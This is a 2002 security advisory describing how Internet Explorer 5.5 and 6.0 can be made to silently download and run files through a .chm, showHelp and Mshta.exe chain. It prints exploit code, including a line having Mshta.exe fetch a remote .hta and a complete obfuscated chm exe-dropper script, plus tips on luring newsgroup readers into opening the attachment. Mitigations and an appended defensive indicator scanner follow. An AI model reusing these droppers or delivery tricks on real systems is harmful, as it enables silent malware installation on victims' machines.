
Internet Explorer may be fooled by remote site to download and run any file
8th Feb 2002 [SBWID-5080]
COMMAND

	IE may be fooled by remote site to download and run any file

SYSTEMS AFFECTED

	Internet Explorer 5.5 and 6.0

PROBLEM

	http-equiv [http://www.malware.com] posted:

	Default installation of Internet Explorer 5.5 and 6.0 still allows us
	to execute files on default installations of the target computer:
	technically trivial silent delivery and installation of an executable
	on the target computer.
	

	We cobble together new and old components as follows:
	

	1. Courtesy of Georgi Guninski
	   see : [http://www.securityfocus.com/bid/1033]

	2. Courtesy of Georgi Guninski
	   see : [http://www.securityfocus.com/bid/2456]

	3. Mshta.exe http://www.malware.com/foobar.hta
	   see : [http://www.securitybugware.org/NT/1279.html]

	

	Neither 1 nor 2 above can be exploited alone.
	

	Nothing can be activated through the Temporary Internet Files unless
	full path names are known for both the showHelp call and the Click() of
	our link.
	

	However, the malware team was able to retrieve from the Temporary Internet
	Files a trojanised html, determine the location of it, write this
	location out to a showHelp call and thereafter execute a specified
	remote link.
	

	 Sample Exploit :

	 ==============

	

	We create a very simple *.html file like so:
	

	 <bgsound src="http://www.malware.com/malware.chm">

	

	this will pull our *.chm into the Temporary Internet File
	

	we then include the Guninski scripting to determine the location of
	our *.html file like so:
	

	malware=document.URL;
	path=malware.substr(-0,malware.lastIndexOf("\\"));
	path=unescape(path);

	

	we then take that location information and write it  to  a  simple  html
	form like so:
	

	document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
	document.write('<form><input type="hidden"  size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');

	

	technical note: it seems the myriad of patching to date does not make
	it possible to pass the location directly to the showHelp call. It must
	be written to the form, which can then be automatically submitted:
	

	setTimeout('document.malware.submit()',5000);

	

	before we do all that we create our very simple malware.chm and  include
	our link object like so:
	

	C:\WINDOWS\SYSTEM\Mshta.exe,http://www.malware.com/foobar.hta

	

	this is particularly interesting as we are able to pass a link to
	mshta.exe, which in turn will open from the remote site our *.hta which
	includes our executable. All without warning.
	

	technical note: the possibility is excellent to repeat the entire
	process above directly inside the *.chm file and drop an *.exe from
	within the *.chm into the same Temporary Internet Files, using our
	Guninski scripting to determine the location of the *.chm and write
	that to the link parameter within it: value="'+path+'\\malware[1].exe">
	and execute it.
	

	 So what happens?

	 ===============

	

	We construct our trojanised *.html file and send it off to our target
	computer. This can be via mail or news. The recipient receives the mail
	message and attached *.html file. We then convince our unsuspecting
	recipient to open our *.html. This should be quite trivial,
	particularly in news as the attached file is in fact nothing more than
	a 500 byte html file.
	

	Consider the following scenario in your favourite web design news
	group:
	

	Carefully note: there is a hardened security warning when attempting to
	open an attached *.html file. However our combination call for assistance
	coupled with nothing more than a legitimate *.html file should prove
	more than tempting:
	

	screen shot: http://www.malware.com/duh.png 18KB

	

	

	 Why does it happen?

	 ===================
	

	Because our simple *.html file is an attachment, security has it
	transferred to the Temporary Internet Files for opening, under the
	browser's security settings. However, precisely because it is physically
	opened within the TIF, we can use our Guninski scripting to determine the
	exact location, write that exact location to our form and call our
	*.chm where it too resides.
	

	Working example below, includes harmless?? *.exe -- the *.chm is
	hardcoded for Win98. Due to pathetic technical reasons our *.chm is
	off-site and may delay in transferring to the TIF and could possibly
	fail; the working example must be attached to mail or news.
	

	UUEncoded
	


	

	

	 Update (11 February 2002)

	 ======

	

	dzzie [http://geocities.com/dzzie] posted another exploit, a proof of
	concept of a chm exe dropper:
	

	This works from the Internet Temp files directory as well; all someone has
	to do is choose the open option when they click a link to a chm file,
	and they are done.
	

	-------------------------------------------------

	flow of events

	-------------------------------------------------

	

	1) chm opens 

	     a) determines absolute path current folder

	     b) determines parent chm name (in case cached changes name)

	     c) detects winNT or win98 to work on both

	

	2) chm name is used to auto generate vbs script data

	   abs path is used to auto generate html object data

	   script writes dynamically generated content to window

	

	3) first object activated programmatically....vbs script is echoed 

	   into existence into same folder as parent chm file

	

	4) waits 1sec then activates echoed.vbs file...this vbs file

	   reads the parent .chm and extracts a hello world exe that is

	   appended onto the chm file. 

	

	5) after exe is written to disk vbs script then activates it 

	

	-------------------------------------------------------------

	script below

	-------------------------------------------------------------

	

	

	msg='<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\</h1></center>'

	function getChmAbsPath(){
	     t=unescape(location.href)
	     return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
	}

	function getChmName(){
		l=unescape(location.href)
		chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
		t='Chr(92)+'
		for(i=0;i<chmName.length;i++){
		    t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
		}
		return t.substring(0,t.length-1);
	}

	function getInterpreter(){
	    if(navigator.userAgent.indexOf('NT') > 0){
	       return 'cmd';
	    }else{
	       return 'command';
	    }
	}

	vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
	    'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
	    'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):'+
	    'set i=createobject(fso):'+
	    'set o=createobject(fso):'+
	    'set w=createobject(wsc):'+
	    'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
	    'infile=pf+' + getChmName() + ':'+
	    'outfile=pf+exename:'+
	    'OFFSET=XXXXXXX:'+
	    'Set ii=i.OpenTextFile(infile):'+
	    'Set oo=o.OpenTextFile(outfile,2,True):'+
	    'ii.Read OFFSET:'+
	    'While Not ii.AtEndOfStream:'+
	    'oo.Write Chr(Asc(ii.Read(1))):'+
	    'Wend:ii.close:oo.close:'+
	    'w.Run chr(34)+outfile+chr(34)'

	hit='<OBJECT id=shortcut^ type="application/x-oleobject"  '+
	    'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
	    'codebase="hhctrl.ocx#Version=4,72,8252,0" width=100 '+
	    'height=100><PARAM name="Command" value="ShortCut">   '+
	    '<PARAM name="Text" value="Text: ">                   '+
	    '<PARAM name="Item1" value=\',*\'>                    '+
	    '<PARAM name="Item2" value="273,1,1"></OBJECT>        '

	scriptPath = getChmAbsPath() + 'echoed.vbs'

	cmd=new Array
	cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
	cmd[2]='wscript,"' + scriptPath + '"'

	function replace(h,i,c){
		h = h.split('^').join(i).split('*').join(c)
	    return h
	}

	hit1=replace(hit,1,cmd[1])
	hit2=replace(hit,2,cmd[2])

	document.write(hit1+hit2+msg)
	shortcut1.Click()
	setTimeout("shortcut2.Click()",1000)

	

SOLUTION

	 1. Be aware of "innocent" *.html files in mail and news

	 2. Disable Active Scripting and ActiveX controls

	 3. Disable the HHCtrl ActiveX control,
	    see: [http://www.kb.cert.org/vuls/id/25249]

	 4. Disable or remove Mshta.exe [although if an *.exe is
	    embedded directly into the *.chm then this has no impact]
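A mail-gateway or file-scanner check for the indicators this advisory describes in both posts (the .chm pulled in through a bgsound tag, the showHelp form, the HHCtrl ShortCut object with the clsid from dzzie's script, and an Mshta.exe link), written here as an added example that is not part of the advisory or of either author's code; the HTML samples are constructed and the indicator names are my own.

```python
import re

# Indicators taken from the advisory text: http-equiv's bgsound/.chm + showHelp
# chain and dzzie's HHCtrl "ShortCut" object. Indicator names are invented here.
INDICATORS = {
    "bgsound_chm":     re.compile(r"<bgsound[^>]+src\s*=\s*[\"']?[^\"'>]+\.chm", re.I),
    "showhelp_form":   re.compile(r"javascript:\s*window\.showHelp\s*\(", re.I),
    "hhctrl_clsid":    re.compile(r"clsid:\s*adb880a6-d8ff-11cf-9377-00aa003b7a11", re.I),
    "hhctrl_shortcut": re.compile(r'name\s*=\s*"?Command"?\s+value\s*=\s*"?ShortCut', re.I),
    "mshta_link":      re.compile(r"mshta\.exe\s*,", re.I),
    "tif_path_probe":  re.compile(r"document\.URL|location\.href", re.I),
}


def scan_html(html):
    """Return the names of all indicators present in one HTML/HTA/CHM-topic document."""
    return [name for name, rx in INDICATORS.items() if rx.search(html)]


def classify(html):
    """Combine indicators into a verdict; a lone path probe is ordinary JavaScript."""
    hits = set(scan_html(html))
    if "hhctrl_shortcut" in hits or "hhctrl_clsid" in hits:
        return "malicious:hhctrl-shortcut"
    # showHelp only matters when paired with a .chm pull or a TIF path probe.
    if "showhelp_form" in hits and hits & {"bgsound_chm", "tif_path_probe"}:
        return "malicious:showhelp-chm"
    if "mshta_link" in hits:
        return "suspicious:mshta"
    return "clean"


# Constructed samples (not real attachments) covering the advisory's two stages.
SAMPLE_DROPPER = (
    '<html><bgsound src="http://example.invalid/payload.chm"><script>'
    'path=document.URL;'
    'document.write(\'<FORM name="f" ACTION="javascript:window.showHelp('
    'document.forms[0].elements[0].value)">\');</script></html>'
)
SAMPLE_HHCTRL = (
    '<OBJECT classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'
    '<PARAM name="Command" value="ShortCut"></OBJECT>'
)
SAMPLE_BENIGN = '<html><body><p>Release notes</p><script>var u=location.href;</script></body></html>'

if __name__ == "__main__":
    for label, doc in (("dropper", SAMPLE_DROPPER), ("hhctrl", SAMPLE_HHCTRL), ("benign", SAMPLE_BENIGN)):
        print(label, classify(doc), scan_html(doc))
```

A lone `tif_path_probe` hit is deliberately reported as clean, since reading `location.href` is common in legitimate pages; the verdict turns on the launcher being present.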

	
